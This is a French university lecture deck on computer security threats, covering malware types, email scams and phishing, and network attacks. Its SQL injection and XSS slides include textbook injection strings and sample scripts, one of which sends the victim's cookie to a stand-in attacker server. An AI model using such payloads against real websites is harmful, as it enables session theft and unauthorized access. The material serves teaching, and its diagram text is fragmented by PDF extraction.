0% ont trouvé ce document utile (0 vote)
246 vues54 pages

Guide des Menaces Informatiques

Transféré par

Ahlem Brahmi
Copyright
© © All Rights Reserved
Nous prenons très au sérieux les droits relatifs au contenu. Si vous pensez qu’il s’agit de votre contenu, signalez une atteinte au droit d’auteur ici.
Formats disponibles
Téléchargez aux formats PDF, TXT ou lisez en ligne sur Scribd
0% ont trouvé ce document utile (0 vote)
246 vues54 pages

Guide des Menaces Informatiques

Transféré par

Ahlem Brahmi
Copyright
© © All Rights Reserved
Nous prenons très au sérieux les droits relatifs au contenu. Si vous pensez qu’il s’agit de votre contenu, signalez une atteinte au droit d’auteur ici.
Formats disponibles
Téléchargez aux formats PDF, TXT ou lisez en ligne sur Scribd

PLAN

1 INTRODUCTION

2 MENACES ET ATTAQUES INFORMATIQUE

3 SYSTÈMES ET OUTILS DE PROTECTIONS

4 ADMINISTRATION D’ACCÈS AUX DONNÉES

5 PROTOCOLES ET CERTIFICATS DE SÉCURITÉ

6 CRYPTOGRAPHIE

7 BIOMÉTRIE

© C. KHAMMASSI – 3BI-EB-BIS, FSJEGJ SÉCURITÉ INFORMATIQUE


16
MENACES ET ATTAQUES INFORMATIQUES
TYPES DE MENACES
Il existe plusieurs catégories de menaces informatiques qui peuvent être classées
comme suit :

Défaillance matérielle : Tout équipement physique est sujet à défaillance


(Usure, vieillissement, défaut…).

Défaillance logicielle : Tout programme informatique contient des bugs


(Pas mise à jour régulière des logiciels)

Accidents : Pannes, incendies, inondations sont des accidents qui peuvent


provoquer des pannes voir une destruction du matériel informatique et
des données.

© C. KHAMMASSI – 3BI-EB-BIS, FSJEGJ SÉCURITÉ INFORMATIQUE


17
MENACES ET ATTAQUES INFORMATIQUES
TYPES DE MENACES
Il existe plusieurs types de menaces informatiques qui sont classées comme suit :

Erreur humaine : il est préférable de faire les formations adéquates du


personnel pour réduire ce problème.

Vol via des dispositifs physique : Il faut contrôler l’accès aux équipements
en mettant des dispositifs de surveillances et en tolérant l’utilisation des
unités amovibles que sur certains équipements.

Programme malveillant : il a pour but de causer des problèmes dans le


système ou de réaliser des actions de piratage.

Attaques réseaux : ce sont des actions malveillantes réaliser sur le réseau


informatique ou en utilisant les e-mails.

© C. KHAMMASSI – 3BI-EB-BIS, FSJEGJ SÉCURITÉ INFORMATIQUE


18
MENACES ET ATTAQUES INFORMATIQUES
TYPES D’ATTAQUES
Une attaque peut être classée par son comportement ou par la position de l’attaquant.

Active
Basé sur le
comportement
de l'attaque
Passive

Type d'attaque

Interne
Basé sur la
position de
l'attaquant
Externe

© C. KHAMMASSI – 3BI-EB-BIS, FSJEGJ SÉCURITÉ INFORMATIQUE


19
MENACES ET ATTAQUES INFORMATIQUES
PROGRAMMES MALVEILLANTS
Un programme malveillant (« malware » en anglais) est un programme développé
dans le but de nuire à un système informatique, sans l’accord de l’utilisateur dont
l’ordinateur est infecté.

Les logiciels malveillants peuvent être classés en fonction des trois mécanismes
suivants :

Mécanisme de propagation : par réseau ou par support amovible.

Mécanisme de déclanchement : l’action du malveillant commence à une


date bien précise ou lorsque un événement se réalise.

Charge utile : qui représente les effets ou les dégâts que le malveillant peut
causer au système.
© C. KHAMMASSI – 3BI-EB-BIS, FSJEGJ SÉCURITÉ INFORMATIQUE
20
MENACES ET ATTAQUES INFORMATIQUES
PROGRAMMES MALVEILLANTS
Les programme malveillants se déplacent entre les ordinateurs à cause de l’utilisateur :

Se déplace

Ordinateur Ordinateur
Programme
infecté
malveillant

À cause de

Ignorance

Curiosité
Utilisateur

© C. KHAMMASSI – 3BI-EB-BIS, FSJEGJ SÉCURITÉ INFORMATIQUE


21
MENACES ET ATTAQUES INFORMATIQUES
PROGRAMMES MALVEILLANTS
Exemples de programmes malveillants :

Virus Informatique

Ver informatique (Worm)

Cheval de Troie (Trojan horse)

Rootkit

Porte dérobée (Backdoor)

Enregistreur de frappe (keylogger)

Logiciel espion (Spyware)

© C. KHAMMASSI – 3BI-EB-BIS, FSJEGJ SÉCURITÉ INFORMATIQUE


22
MENACES ET ATTAQUES INFORMATIQUES
PROGRAMMES MALVEILLANTS
Virus Informatique

Un virus informatique est un automate auto réplicatif à la base non malveillant, mais

aujourd’hui souvent additionné de code malveillant, conçu pour se propager à

d’autres ordinateurs en s’insérant dans des logiciels légitimes, appelés « hôtes ».

Virus

Programme

© C. KHAMMASSI – 3BI-EB-BIS, FSJEGJ SÉCURITÉ INFORMATIQUE


23
MENACES ET ATTAQUES INFORMATIQUES
PROGRAMMES MALVEILLANTS
Virus Informatique

Les virus peuvent contaminer une machine de plusieurs manières :

Support amovible

Téléchargement de fichier inconnu

Document contenant des macros


Virus Infecter Ordinateur

Pièce jointe dans un email

Faille de sécurité dans un programme

© C. KHAMMASSI – 3BI-EB-BIS, FSJEGJ SÉCURITÉ INFORMATIQUE


24
MENACES ET ATTAQUES INFORMATIQUES
PROGRAMMES MALVEILLANTS
Ver informatique (Worm)

Un ver informatique est un programme malveillant qui est capable de se reproduire et

se propager d’une façon autonome sur les réseaux informatiques.

Ordinateur
infecté

© C. KHAMMASSI – 3BI-EB-BIS, FSJEGJ SÉCURITÉ INFORMATIQUE


25
MENACES ET ATTAQUES INFORMATIQUES
PROGRAMMES MALVEILLANTS
Ver informatique (Worm)

Le ver est souvent transmis aux ordinateurs en utilisant :

Support amovible

Téléchargement de fichier inconnu

Ver Infecter Ordinateur Site de source inconnue ou piraté

Pièce jointe dans un email (.exe, .vbs,..)

© C. KHAMMASSI – 3BI-EB-BIS, FSJEGJ SÉCURITÉ INFORMATIQUE


26
MENACES ET ATTAQUES INFORMATIQUES
PROGRAMMES MALVEILLANTS
Ver informatique (Worm)

L’architecture d’un ver est composée de deux parties :

Partie principale du ver : recherche de failles , responsable de la transmission


de la deuxième partie du ver.
Vecteur

Partie « morte » du ver qui sera envoyée sur le système distant et l’infectera.

Archive Nécessite l’existence d’un compilateur sur la machine


Archive cible
Source

Nécessite une compatibilité avec le système


Archive d’exploitation infecté.
Binaire

© C. KHAMMASSI – 3BI-EB-BIS, FSJEGJ SÉCURITÉ INFORMATIQUE


27
MENACES ET ATTAQUES INFORMATIQUES
PROGRAMMES MALVEILLANTS
Ver informatique (Worm)

Les étapes qui permettent la reproduction d’un ver sont les suivantes :

Il s’agit d’une création d’un


fichier temporaire ou la
compilation d’une partie de
l’archive.
Recherche Identification
Initialisation de l’hôte de l’hôte

Reproduction Invasion Attaque

© C. KHAMMASSI – 3BI-EB-BIS, FSJEGJ SÉCURITÉ INFORMATIQUE


28
MENACES ET ATTAQUES INFORMATIQUES
PROGRAMMES MALVEILLANTS
Ver informatique (Worm)

Les étapes qui permettent la reproduction d’un ver sont les suivantes :

Le ver lance un scan d’IP


aléatoire ou incrémental
pour déterminer les
systèmes actifs.
Recherche Identification
Initialisation de l’hôte de l’hôte

Reproduction Invasion Attaque

© C. KHAMMASSI – 3BI-EB-BIS, FSJEGJ SÉCURITÉ INFORMATIQUE


29
MENACES ET ATTAQUES INFORMATIQUES
PROGRAMMES MALVEILLANTS
Ver informatique (Worm)

Les étapes qui permettent la reproduction d’un ver sont les suivantes :

Après la détection d’une


victime potentielle le ver
teste si son système possède
des failles pouvant être
Recherche Identification
Initialisation de l’hôte de l’hôte
exploitées, un compilateur
approprié, etc.

Reproduction Invasion Attaque

© C. KHAMMASSI – 3BI-EB-BIS, FSJEGJ SÉCURITÉ INFORMATIQUE


30
MENACES ET ATTAQUES INFORMATIQUES
PROGRAMMES MALVEILLANTS
Ver informatique (Worm)

Les étapes qui permettent la reproduction d’un ver sont les suivantes :

C’est la phase dans laquelle


le ver exploite les
vulnérabilités identifiées
dans la phase précédente
Recherche Identification
Initialisation de l’hôte de l’hôte
pour obtenir un accès sur la
machine cible.

Reproduction Invasion Attaque

© C. KHAMMASSI – 3BI-EB-BIS, FSJEGJ SÉCURITÉ INFORMATIQUE


31
MENACES ET ATTAQUES INFORMATIQUES
PROGRAMMES MALVEILLANTS
Ver informatique (Worm)

Les étapes qui permettent la reproduction d’un ver sont les suivantes :

Le vecteur est maintenant


sur la machine cible, mais
n’est pas encore actif. Dès
cet instant, le vecteur va
Recherche Identification
Initialisation de l’hôte de l’hôte
rapatrier la partie archive
sur le système infecter.

Reproduction Invasion Attaque

© C. KHAMMASSI – 3BI-EB-BIS, FSJEGJ SÉCURITÉ INFORMATIQUE


32
MENACES ET ATTAQUES INFORMATIQUES
PROGRAMMES MALVEILLANTS
Ver informatique (Worm)

Les étapes qui permettent la reproduction d’un ver sont les suivantes :

Deux possibilités pour la


reproduction du ver :
 Soit le ver sur la machine
Recherche Identification mère est détruit ainsi le
Initialisation de l’hôte de l’hôte ver se déplace d’une
machine à une autre,
 Soit le ver de la machine
mère n’est pas détruit et
comme résultat la
propagation du ver sera
exponentielle.
Reproduction Invasion Attaque

© C. KHAMMASSI – 3BI-EB-BIS, FSJEGJ SÉCURITÉ INFORMATIQUE


33
MENACES ET ATTAQUES INFORMATIQUES
PROGRAMMES MALVEILLANTS
Cheval de Troie (Trojan horse)

Un cheval de Troie (Trojan horse) est un malveillant qui est à première vue semble un

logiciel en apparence légitime mais qui contient des fonctionnalités malveillantes.

Le rôle du cheval de Troie est de faire installer un intrus malveillant sur l’ordinateur

lors de son exécution par l’utilisateur.

Cheval de
Utilisateur Exécuter Troie Installer Ordinateur
l’intrus

© C. KHAMMASSI – 3BI-EB-BIS, FSJEGJ SÉCURITÉ INFORMATIQUE


34
MENACES ET ATTAQUES INFORMATIQUES
PROGRAMMES MALVEILLANTS
Cheval de Troie (Trojan horse)

Dans la plupart des cas, l’utilisateur est le premier responsable puisque c’est lui qui va

exécuter le cheval de Troie qui peut être par exemple :

Jeux payant Logiciel payant


cracké cracké

Télécharger

Cheval de
Utilisateur Troie Keygen Crack

Installer

Outil de
piratage

© C. KHAMMASSI – 3BI-EB-BIS, FSJEGJ SÉCURITÉ INFORMATIQUE


35
MENACES ET ATTAQUES INFORMATIQUES
PROGRAMMES MALVEILLANTS
Cheval de Troie (Trojan horse)

Un cheval de Troie peut causer différentes manifestations d’infection :

Activité anormale de la carte réseau ou du modem ou du disque dur.

Réactions bizarres de la souris.

Ouverture des lecteurs CD/DVD ou exécution non voulu de certains


programmes.

Plantages répétés de l’ordinateur et redémarrage répété du système.

© C. KHAMMASSI – 3BI-EB-BIS, FSJEGJ SÉCURITÉ INFORMATIQUE


36
MENACES ET ATTAQUES INFORMATIQUES
PROGRAMMES MALVEILLANTS
Cheval de Troie (Trojan horse)

Un cheval de Troie peut causer différentes manifestations d’infection :

Des fenêtres et des messages inhabituels.

Changement inhabituel des paramètres de l’ordinateur : bouton de la


souris, volume audio, arrière-plan, etc.

Exécution non volontaire de certains programmes et ouverture de


certaines pages web.

Existence de logiciels non volontairement installés

© C. KHAMMASSI – 3BI-EB-BIS, FSJEGJ SÉCURITÉ INFORMATIQUE


37
MENACES ET ATTAQUES INFORMATIQUES
PROGRAMMES MALVEILLANTS
Rootkit

Un rootkit, aussi appelé « outil de dissimulation d’activité », est ensemble de logiciels

permettant généralement d'obtenir les droits d'administrateur sur une machine de la

manière la plus furtive possible.

Rootkit Droits
administrateur
Ensemble de
logiciel

© C. KHAMMASSI – 3BI-EB-BIS, FSJEGJ SÉCURITÉ INFORMATIQUE


38
MENACES ET ATTAQUES INFORMATIQUES
PROGRAMMES MALVEILLANTS
Rootkit

Un rootkit peut être transmis par les techniques virales en utilisant un virus ou un
cheval de Troie.

L’objectif de l’attaquant est de :

Mettre à sa disposition toutes les ressources de la


machine cible pour l’espionner

Accéder aux données


Attaquant

Utiliser comme intermédiaire pour d’autres


attaques (Zombie, Botnet)

© C. KHAMMASSI – 3BI-EB-BIS, FSJEGJ SÉCURITÉ INFORMATIQUE


39
MENACES ET ATTAQUES INFORMATIQUES
PROGRAMMES MALVEILLANTS
Porte dérobée(Backdoor)

Une porte dérobée (Backdoor) est une fonctionnalité introduite par le développeur
d’un logiciel et inconnue par l’utilisateur légitime.

Elle permet de fournir un accès secret au logiciel dans la plupart des cas pour :

Faciliter les opérations de maintenance

Porte dérobée
Développeur Désactiver le logiciel en cas de
désaccord avec le client (non-paiement
de licence).

© C. KHAMMASSI – 3BI-EB-BIS, FSJEGJ SÉCURITÉ INFORMATIQUE


40
MENACES ET ATTAQUES INFORMATIQUES
PROGRAMMES MALVEILLANTS
Porte dérobée(Backdoor)

Cependant, il est possible d’utiliser cette porte à des fins malicieux si la porte a été
mise en place par un pirate informatique tels que :

Prendre le contrôle de la machine pour mener des actions malveillates


(envoi de pourriels, virus, déni de service).

Espionner et surveiller les activités de l’utilisateur

Détruire des données ayant une valeur

Contrôle d’un vaste réseau d’ordinateurs (Botnet) pour mener un déni


de service distribué

© C. KHAMMASSI – 3BI-EB-BIS, FSJEGJ SÉCURITÉ INFORMATIQUE


41
MENACES ET ATTAQUES INFORMATIQUES
PROGRAMMES MALVEILLANTS
Enregistreur de frappe (Keylogger)

L'enregistrement de frappe consiste à surveiller toutes les frappes effectuées sur un


clavier d'ordinateur, souvent sans la permission ou la connaissance de l'utilisateur.

Il est utilisé pour enregistrer des informations sensibles pour les envoyer au pirate :

Mots de passe
Keylogger
Numéros de cartes de crédit

Numéros de comptes bancaires

Pirate
Communications
Données

© C. KHAMMASSI – 3BI-EB-BIS, FSJEGJ SÉCURITÉ INFORMATIQUE


42
MENACES ET ATTAQUES INFORMATIQUES
PROGRAMMES MALVEILLANTS
Logiciel d’espionnage (Spyware)

Un logiciel espion (appelé mouchard ou Spyware) est un logiciel malveillant qui


s’installe dans un ordinateur dans le but de collecter des informations sur l’utilisateur
et ses habitudes de navigation dans le but de mieux cibler la publicité sur Internet.

Ordinateur

Collecter Stocker Envoyer


Cibler la publicité
Spyware Données
Sur Internet

Habitudes de
navigation

© C. KHAMMASSI – 3BI-EB-BIS, FSJEGJ SÉCURITÉ INFORMATIQUE


43
MENACES ET ATTAQUES INFORMATIQUES
MENACES PAR MAIL

Il existe d’autres menaces informatiques qui peuvent être réalisées par la messagerie
électronique :

Pourriel (Spam)

Arnaque (Scam)

Hameçonnage (Phishing)

Canular informatique (Hoax)

© C. KHAMMASSI – 3BI-EB-BIS, FSJEGJ SÉCURITÉ INFORMATIQUE


44
MENACES ET ATTAQUES INFORMATIQUES
MENACES PAR MAIL

Pourriel (Spam)

Un pourriel (spam en anglais) est une message électronique non désirable envoyé en
masse à des fins commerciales (Publicité) ou tout simplement pour tenter d’arnaquer
les destinataires.
L’utilisateur introduit son
adresse mail dans les sites
web pour bénéficier d’un
service.
Base de
@ mail Site données

Programme
@ aléatoire d’envoi de
mail

© C. KHAMMASSI – 3BI-EB-BIS, FSJEGJ SÉCURITÉ INFORMATIQUE


45
MENACES ET ATTAQUES INFORMATIQUES
MENACES PAR MAIL

Pourriel (Spam)

Un pourriel (spam en anglais) est une message électronique non désirable envoyé en
masse à des fins commerciales (Publicité) ou tout simplement pour tenter d’arnaquer
les destinataires.
Les sites envoient un
message avec un lien de
confirmation pour s’assurer
que l’adresse est valide.
Base de
@ mail Site données

Programme
@ aléatoire d’envoi de
mail

© C. KHAMMASSI – 3BI-EB-BIS, FSJEGJ SÉCURITÉ INFORMATIQUE


46
MENACES ET ATTAQUES INFORMATIQUES
MENACES PAR MAIL

Pourriel (Spam)

Un pourriel (spam en anglais) est une message électronique non désirable envoyé en
masse à des fins commerciales (Publicité) ou tout simplement pour tenter d’arnaquer
les destinataires.
Les emails valides sont
stockés pour être vendus à
des sociétés de publicité.

Base de
@ mail Site données

Programme
@ aléatoire d’envoi de
mail

© C. KHAMMASSI – 3BI-EB-BIS, FSJEGJ SÉCURITÉ INFORMATIQUE


47
MENACES ET ATTAQUES INFORMATIQUES
MENACES PAR MAIL

Pourriel (Spam)

Un pourriel (spam en anglais) est une message électronique non désirable envoyé en
masse à des fins commerciales (Publicité) ou tout simplement pour tenter d’arnaquer
les destinataires.
Les sociétés de publicité
envoient les email
publicitaires en utilisant les
adresses valides récupérées.
Base de
@ mail Site données

Programme
@ aléatoire d’envoi de
mail

© C. KHAMMASSI – 3BI-EB-BIS, FSJEGJ SÉCURITÉ INFORMATIQUE


48
MENACES ET ATTAQUES INFORMATIQUES
MENACES PAR MAIL

Pourriel (Spam)

Un pourriel (spam en anglais) est une message électronique non désirable envoyé en
masse à des fins commerciales (Publicité) ou tout simplement pour tenter d’arnaquer
les destinataires.
Il est possible de générer
aléatoirement des adresses
mail. Mais ce n’est pas une
bonne solution.
Base de
@ mail Site données

Programme
@ aléatoire d’envoi de
mail

© C. KHAMMASSI – 3BI-EB-BIS, FSJEGJ SÉCURITÉ INFORMATIQUE


49
MENACES ET ATTAQUES INFORMATIQUES
MENACES PAR MAIL

Arnaque (Scam)

C’est une forme de pourriel mais à caractère frauduleux :

Exemple

Le message demande de l'aide afin de transférer des fonds depuis un compte en

banque ou encore vous annonce le gain d’une somme d’argent. A la fin, il vous

demande de payer une petite somme d’argent pour des frais de poste ou de

douane.

© C. KHAMMASSI – 3BI-EB-BIS, FSJEGJ SÉCURITÉ INFORMATIQUE


50
MENACES ET ATTAQUES INFORMATIQUES
MENACES PAR MAIL

Hameçonnage (Phishing)

 C’est une forme de de courrier indésirable.

 Consiste à tromper le destinataire en faisant passer un courriel pour un message de


sa banque ou d'un quelconque service protégé par mot de passe.

Le but est de récupérer les données personnelles des destinataires en les


attirant sur un site falsifié enregistrant toutes leurs actions.

Mot de passe

Mail contenant Pirate


Utilisateur Fausse page
un lien
N° de carte

© C. KHAMMASSI – 3BI-EB-BIS, FSJEGJ SÉCURITÉ INFORMATIQUE


51
MENACES ET ATTAQUES INFORMATIQUES
MENACES PAR MAIL

Canular informatique (Hoax)

C’est un courrier électronique incitant généralement le destinataire à retransmettre le

message à ses contacts sous divers prétextes.

Dans la plupart des cas il s’agit d’une rumeur.

Ils encombrent le réseau, et favorise la désinformation.

Dans certains cas, ils incitent l'utilisateur à effectuer des manipulations


dangereuses sur son poste (suppression d'un fichier prétendument lié à un
virus par exemple).

© C. KHAMMASSI – 3BI-EB-BIS, FSJEGJ SÉCURITÉ INFORMATIQUE


52
MENACES ET ATTAQUES INFORMATIQUES
ATTAQUES RÉSEAUX
Il existe d’autres attaques utilisant les réseaux informatiques :

Attaque par force brute

Attaque par écoutes (Sniffing)

Usurpation d'identité (Spoofing)

Injection SQL

Injection de Script

Déni de service

Sonde

Homme du milieu

© C. KHAMMASSI – 3BI-EB-BIS, FSJEGJ SÉCURITÉ INFORMATIQUE


53
MENACES ET ATTAQUES INFORMATIQUES
ATTAQUES RÉSEAUX
Attaque par force brute

Une attaque par force brute est une tentative de trouver la clé utilisée pour décrypter

une donnée cryptée ou de déchiffrer un mot de passe utilisateur.

Logiciel Données
automatisé Clé
cryptées

Pirate

Mot de
Dictionnaire Service
passe
protégé

© C. KHAMMASSI – 3BI-EB-BIS, FSJEGJ SÉCURITÉ INFORMATIQUE


54
MENACES ET ATTAQUES INFORMATIQUES
ATTAQUES RÉSEAUX
Attaque par écoutes (Sniffing)

L'attaque par renifleur est une menace de sécurité réseau visant à capturer des

paquets réseau non-chiffrés à l'aide d'une application renifleur.

Email

Logiciel
Pirate Paquet
renifleur Réseau non chiffré Fichier

Page Web

Paquet
chiffré
Mot de passe

© C. KHAMMASSI – 3BI-EB-BIS, FSJEGJ SÉCURITÉ INFORMATIQUE


55
MENACES ET ATTAQUES INFORMATIQUES
ATTAQUES RÉSEAUX
Usurpation d'identité (Spoofing)

C’est une technique de l’ingénierie sociale consistant à utiliser l'identité d'une autre

personne pour récupérer des informations sensibles, que l'on ne pourrait pas avoir

autrement.

Mot de passe

Identité
Email
utilisateur

N° de carte
Pirate

Identité
Paquet
réseau
Argent

© C. KHAMMASSI – 3BI-EB-BIS, FSJEGJ SÉCURITÉ INFORMATIQUE


56
MENACES ET ATTAQUES INFORMATIQUES
ATTAQUES RÉSEAUX
Injection SQL

L'attaque par injection SQL (SQLi) est effectuée en injectant des instructions SQL

néfastes dans le cadre d'une requête de base de données dans le but de contrôler une

base de données d'application.


Modification

Suppression

Requête SQL Base de Insertion


Pirate Formulaire
néfastes données

Vole d’ identités

© C. KHAMMASSI – 3BI-EB-BIS, FSJEGJ SÉCURITÉ INFORMATIQUE


57
MENACES ET ATTAQUES INFORMATIQUES
ATTAQUES RÉSEAUX
Injection SQL

Les caractères -- marquent le début


Chaouki ';--
d'un commentaire en SQL.

L'apostrophe indique la fin de la


zone de frappe de l'utilisateur.

N'importe lequel mot de passe

SELECT uid FROM Users WHERE name = ‘Chaouki';--' AND password = '4e383a164dq48pa789e';

Commentaire

SELECT uid FROM Users WHERE name = ‘Chaouki';

© C. KHAMMASSI – 3BI-EB-BIS, FSJEGJ SÉCURITÉ INFORMATIQUE


58
MENACES ET ATTAQUES INFORMATIQUES
ATTAQUES RÉSEAUX
Injection SQL
Les caractères -- marquent le début
d'un commentaire en SQL.
Chaouki
L'apostrophe indique la fin de la
' or 1 -- zone de frappe de l'utilisateur.

« or 1 » demande au script si 1 est


vrai, or c'est toujours le cas.

SELECT uid FROM Users WHERE name = ‘Chaouki‘ AND password = '' or 1 --';

Connexion à la session de Chaouki

© C. KHAMMASSI – 3BI-EB-BIS, FSJEGJ SÉCURITÉ INFORMATIQUE


59
MENACES ET ATTAQUES INFORMATIQUES
ATTAQUES RÉSEAUX
Injection de Script

Le Cross-Site Scripting (XSS) est une attaque basée sur l'injection de scripts

malveillants.

Le code malveillant est généralement écrit avec des langages de programmation côté

client tels que :

VBS

JavaScript VBScript HTML Flash

© C. KHAMMASSI – 3BI-EB-BIS, FSJEGJ SÉCURITÉ INFORMATIQUE


60
MENACES ET ATTAQUES INFORMATIQUES
ATTAQUES RÉSEAUX
Injection de Script

Le script malveillant peut être reflété sur le navigateur de la victime.

Exécution du
1 Envoi d’un Lien piégé code

4
Pirate
Envoi de données 5
Victime
2
Page demandée
contenant le code Ouvrir le lien
injecté dans l’URL
par le pirate 3

Site Web
ciblé

© C. KHAMMASSI – 3BI-EB-BIS, FSJEGJ SÉCURITÉ INFORMATIQUE


61
MENACES ET ATTAQUES INFORMATIQUES
ATTAQUES RÉSEAUX
Injection de Script

Le script malveillant peut être stocké dans la base de données du site web vulnérable.

Exécution du
code

5 4
Envoi de données
Pirate
Victime
1
2 Page demandée
Visite de la contenant le code
page piégée injecté par le
3 pirate
Injection du code
nocif dans un site
web

Site Web
ciblé

© C. KHAMMASSI – 3BI-EB-BIS, FSJEGJ SÉCURITÉ INFORMATIQUE


62
MENACES ET ATTAQUES INFORMATIQUES
ATTAQUES RÉSEAUX
Injection de Script

Destruction de la page

Ici le contenu de la page est remplacé par la phrase : « Vous êtes victime d’une attaque
XSS ! » clignotant en rouge.

<script type="text/javascript"> msg = "<p


style=„text-decoration:blink;color :#F00 ;‟> Vous
êtes victime d‟une attaque XSS ! </p>" ;
document.write(msg) ; </script>

© C. KHAMMASSI – 3BI-EB-BIS, FSJEGJ SÉCURITÉ INFORMATIQUE


63
MENACES ET ATTAQUES INFORMATIQUES
ATTAQUES RÉSEAUX
Injection de Script

Redirection

Cette redirection peut amener sur un site piégé, par exemple une copie du site
vulnérable. Cette attaque par Phishing permettrait de voler les identifiants d’un
utilisateur.

<script type="text/javascript">
document.location = "http://www.serveur-
distant.net/page-piege.php" ;
</script>

© C. KHAMMASSI – 3BI-EB-BIS, FSJEGJ SÉCURITÉ INFORMATIQUE


64
MENACES ET ATTAQUES INFORMATIQUES
ATTAQUES RÉSEAUX
Injection de Script

Vol de Cookies

En utilisant un autre script hébergé sur le serveur pirate, le script suivant permet au
pirate de générer le cookie dans son navigateur avant d’accéder au compte de la
victime.

<script type="text/javascript">
var addr = “http://www.serveur-distant.net/page-
piege.php?cookie=” + document.cookie ;
var imgTag = document.createElement("img") ;
imgTag.setAttribute("src",addr) ;
document.body.appendChild(imgTag) ;
</script>

© C. KHAMMASSI – 3BI-EB-BIS, FSJEGJ SÉCURITÉ INFORMATIQUE


65
MENACES ET ATTAQUES INFORMATIQUES
ATTAQUES RÉSEAUX
Déni de service

Un déni de service (DoS) est une attaque qui inonde un service ou une ressource

réseau avec de grandes quantités de paquets pour le rendre inaccessible.

Victime
Paquets
Serveur
inaccessible

Paquets

Pirate

© C. KHAMMASSI – 3BI-EB-BIS, FSJEGJ SÉCURITÉ INFORMATIQUE


66
MENACES ET ATTAQUES INFORMATIQUES
ATTAQUES RÉSEAUX
Déni de service

L'attaquant peut prendre le contrôle de nombreux ordinateurs afin de créer un réseau

de machines (bots ou zombies) pour effectuer une attaque DoS distribuée (DDos).

Victime 1

Victime 2
… Serveur
Pirate inaccessible

Victime n

© C. KHAMMASSI – 3BI-EB-BIS, FSJEGJ SÉCURITÉ INFORMATIQUE


67
MENACES ET ATTAQUES INFORMATIQUES
ATTAQUES RÉSEAUX
Sonde

La sonde (Probe) est un type d'attaque passive dans lequel un pirate collecte des

informations sur un hôte ou un réseau cible : Services et applications


en cours d'exécution

Applications installées

Nombre et les types de


Hôte machines connectées

Pirate Analyse de port

Réseau

Système d'exploitation

© C. KHAMMASSI – 3BI-EB-BIS, FSJEGJ SÉCURITÉ INFORMATIQUE


68
MENACES ET ATTAQUES INFORMATIQUES
ATTAQUES RÉSEAUX
Homme du milieu

L'attaque de l'homme du milieu (man-in-the-middle attack) est une attaque qui a pour

but d'intercepter les communications entre deux parties, sans que ni l'une ni l'autre

puisse se douter que le canal de communication a été compromis.

Victime Site Web

Pirate

© C. KHAMMASSI – 3BI-EB-BIS, FSJEGJ SÉCURITÉ INFORMATIQUE


69

Vous aimerez peut-être aussi